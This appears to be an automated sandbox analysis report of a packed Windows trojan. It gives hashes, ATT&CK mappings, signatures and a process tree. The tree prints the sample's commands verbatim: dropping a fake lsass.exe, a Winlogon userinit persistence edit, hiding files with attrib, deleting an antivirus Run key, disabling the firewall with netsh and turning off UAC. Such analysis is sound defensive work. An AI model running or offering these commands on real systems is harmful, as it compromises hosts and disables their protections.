60b172610c3ca7b9b4fd9fb38a973addf1f9912ecdb4b91555385b1281bb403b

Analysis

max time kernel
148s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20/09/2024, 04:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe
Size

235KB
MD5

ece26f63d87e0a13aa50066591aee9a4
SHA1

cad90fc91e4e588276cc3ecc632f526481630d07
SHA256

60b172610c3ca7b9b4fd9fb38a973addf1f9912ecdb4b91555385b1281bb403b
SHA512

ff074cd04ef489adf4cac76a16c9c6bdebe0f2e3720798ddd71dc8584a3df7e9811286fab2ed499bce03a63d49aaf59420ebf81be606e5525c057ff4ee828846
SSDEEP

6144:LwrfkA04eb5aK1HM/hxX1UhIPOXKKpkJsHViB:L8kA04e9lG/bX1Uh/SrB

Score

10^/10

defense_evasion discovery evasion persistence privilege_escalation trojan upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit = "C:\\WINDOWS\\system32\\userinit.exe,C:\\Program Files\\Common Files\\Service Share\\lsass.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2620	netsh.exe

Executes dropped EXE 1 IoCs

pid	Process
2576	lsass.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2440-0-0x0000000000400000-0x0000000000D55000-memory.dmp	upx
behavioral1/memory/2440-1-0x0000000000400000-0x0000000000D55000-memory.dmp	upx
behavioral1/memory/2440-5-0x0000000000400000-0x0000000000D55000-memory.dmp	upx
behavioral1/files/0x0008000000016cfe-6.dat	upx
behavioral1/memory/2576-7-0x0000000000400000-0x0000000000D55000-memory.dmp	upx
behavioral1/memory/2576-10-0x0000000000400000-0x0000000000D55000-memory.dmp	upx
behavioral1/memory/2576-11-0x0000000000400000-0x0000000000D55000-memory.dmp	upx
behavioral1/memory/2576-12-0x0000000000400000-0x0000000000D55000-memory.dmp	upx
behavioral1/memory/2576-22-0x0000000000400000-0x0000000000D55000-memory.dmp	upx

Hide Artifacts: Hidden Files and Directories 1 TTPs 4 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2236	cmd.exe
2764	cmd.exe
2632	cmd.exe
852	cmd.exe

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\Service Share\lsass.exeX	cmd.exe
File opened for modification	C:\Program Files\Common Files\Service Share\lsass.exe	attrib.exe
File opened for modification	C:\Program Files\Common Files\Service Share	attrib.exe
File opened for modification	C:\Program Files\Common Files\Service Share\lsass.exe	attrib.exe
File opened for modification	C:\Program Files\Common Files\Service Share	attrib.exe
File created	C:\Program Files\Common Files\Service Share\lsass.exeX	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lsass.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2536	reg.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1804	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 2108	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	28
PID 2440 wrote to memory of 2108	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	28
PID 2440 wrote to memory of 2108	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	28
PID 2440 wrote to memory of 2108	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	28
PID 2440 wrote to memory of 1804	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	30
PID 2440 wrote to memory of 1804	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	30
PID 2440 wrote to memory of 1804	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	30
PID 2440 wrote to memory of 1804	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	30
PID 2440 wrote to memory of 2776	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	31
PID 2440 wrote to memory of 2776	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	31
PID 2440 wrote to memory of 2776	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	31
PID 2440 wrote to memory of 2776	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	31
PID 2440 wrote to memory of 852	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	34
PID 2440 wrote to memory of 852	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	34
PID 2440 wrote to memory of 852	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	34
PID 2440 wrote to memory of 852	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	34
PID 2440 wrote to memory of 2236	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	36
PID 2440 wrote to memory of 2236	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	36
PID 2440 wrote to memory of 2236	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	36
PID 2440 wrote to memory of 2236	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	36
PID 2776 wrote to memory of 2412	2776	cmd.exe	37
PID 2776 wrote to memory of 2412	2776	cmd.exe	37
PID 2776 wrote to memory of 2412	2776	cmd.exe	37
PID 2776 wrote to memory of 2412	2776	cmd.exe	37
PID 2440 wrote to memory of 1292	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	39
PID 2440 wrote to memory of 1292	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	39
PID 2440 wrote to memory of 1292	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	39
PID 2440 wrote to memory of 1292	2440	ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe	39
PID 852 wrote to memory of 2248	852	cmd.exe	41
PID 852 wrote to memory of 2248	852	cmd.exe	41
PID 852 wrote to memory of 2248	852	cmd.exe	41
PID 852 wrote to memory of 2248	852	cmd.exe	41
PID 1292 wrote to memory of 2664	1292	cmd.exe	42
PID 1292 wrote to memory of 2664	1292	cmd.exe	42
PID 1292 wrote to memory of 2664	1292	cmd.exe	42
PID 1292 wrote to memory of 2664	1292	cmd.exe	42
PID 2236 wrote to memory of 2772	2236	cmd.exe	43
PID 2236 wrote to memory of 2772	2236	cmd.exe	43
PID 2236 wrote to memory of 2772	2236	cmd.exe	43
PID 2236 wrote to memory of 2772	2236	cmd.exe	43
PID 2664 wrote to memory of 2576	2664	cmd.exe	44
PID 2664 wrote to memory of 2576	2664	cmd.exe	44
PID 2664 wrote to memory of 2576	2664	cmd.exe	44
PID 2664 wrote to memory of 2576	2664	cmd.exe	44
PID 2576 wrote to memory of 3012	2576	lsass.exe	45
PID 2576 wrote to memory of 3012	2576	lsass.exe	45
PID 2576 wrote to memory of 3012	2576	lsass.exe	45
PID 2576 wrote to memory of 3012	2576	lsass.exe	45
PID 2576 wrote to memory of 2764	2576	lsass.exe	48
PID 2576 wrote to memory of 2764	2576	lsass.exe	48
PID 2576 wrote to memory of 2764	2576	lsass.exe	48
PID 2576 wrote to memory of 2764	2576	lsass.exe	48
PID 3012 wrote to memory of 2748	3012	cmd.exe	47
PID 3012 wrote to memory of 2748	3012	cmd.exe	47
PID 3012 wrote to memory of 2748	3012	cmd.exe	47
PID 3012 wrote to memory of 2748	3012	cmd.exe	47
PID 2576 wrote to memory of 2632	2576	lsass.exe	50
PID 2576 wrote to memory of 2632	2576	lsass.exe	50
PID 2576 wrote to memory of 2632	2576	lsass.exe	50
PID 2576 wrote to memory of 2632	2576	lsass.exe	50
PID 2576 wrote to memory of 2856	2576	lsass.exe	52
PID 2576 wrote to memory of 2856	2576	lsass.exe	52
PID 2576 wrote to memory of 2856	2576	lsass.exe	52
PID 2576 wrote to memory of 2856	2576	lsass.exe	52

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2248	attrib.exe
2772	attrib.exe
2508	attrib.exe
2768	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe" "C:\Program Files\Common Files\Service Share\lsass.exeX"
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2108
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c move /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\ece26f63d87e0a13aa50066591aee9a4_JaffaCakes118.exe" "C:\Program Files\Common Files\Service Share\lsass.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: RenamesItself
  PID:1804
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v userinit /t reg_sz /d "C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\Service Share\lsass.exe" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\SysWOW64\reg.exe
    reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v userinit /t reg_sz /d "C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\Service Share\lsass.exe" /f
    3⤵
    - Modifies WinLogon for persistence
    - System Location Discovery: System Language Discovery
    PID:2412
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\Service Share\lsass.exe"
  2⤵
  - Hide Artifacts: Hidden Files and Directories
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h "C:\Program Files\Common Files\Service Share\lsass.exe"
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2248
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\Service Share"
  2⤵
  - Hide Artifacts: Hidden Files and Directories
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2236
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h "C:\Program Files\Common Files\Service Share"
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd /c "C:\Program Files\Common Files\Service Share\lsass.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "C:\Program Files\Common Files\Service Share\lsass.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Program Files\Common Files\Service Share\lsass.exe
      "C:\Program Files\Common Files\Service Share\lsass.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2576
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run" /v AVP /f
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3012
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run" /v AVP /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2748
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\Service Share\lsass.exe"
        5⤵
        Hide Artifacts: Hidden Files and Directories
        System Location Discovery: System Language Discovery
        
        PID:2764
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h "C:\Program Files\Common Files\Service Share\lsass.exe"
        6⤵
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2768
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\Service Share"
        5⤵
        Hide Artifacts: Hidden Files and Directories
        System Location Discovery: System Language Discovery
        
        PID:2632
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h "C:\Program Files\Common Files\Service Share"
        6⤵
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2508
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c netsh firewall set opmode disable
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2856
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall set opmode disable
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2620
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2516
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\Service Share\lsass.exe

Filesize
235KB

MD5
ece26f63d87e0a13aa50066591aee9a4

SHA1
cad90fc91e4e588276cc3ecc632f526481630d07

SHA256
60b172610c3ca7b9b4fd9fb38a973addf1f9912ecdb4b91555385b1281bb403b

SHA512
ff074cd04ef489adf4cac76a16c9c6bdebe0f2e3720798ddd71dc8584a3df7e9811286fab2ed499bce03a63d49aaf59420ebf81be606e5525c057ff4ee828846

Download Submit
memory/2440-0-0x0000000000400000-0x0000000000D55000-memory.dmp

Filesize
9.3MB

Download
memory/2440-1-0x0000000000400000-0x0000000000D55000-memory.dmp

Filesize
9.3MB

Download
memory/2440-5-0x0000000000400000-0x0000000000D55000-memory.dmp

Filesize
9.3MB

Download
memory/2576-7-0x0000000000400000-0x0000000000D55000-memory.dmp

Filesize
9.3MB

Download
memory/2576-10-0x0000000000400000-0x0000000000D55000-memory.dmp

Filesize
9.3MB

Download
memory/2576-11-0x0000000000400000-0x0000000000D55000-memory.dmp

Filesize
9.3MB

Download
memory/2576-12-0x0000000000400000-0x0000000000D55000-memory.dmp

Filesize
9.3MB

Download
memory/2576-22-0x0000000000400000-0x0000000000D55000-memory.dmp

Filesize
9.3MB

Download
memory/2664-8-0x0000000002300000-0x0000000002C55000-memory.dmp

Filesize
9.3MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads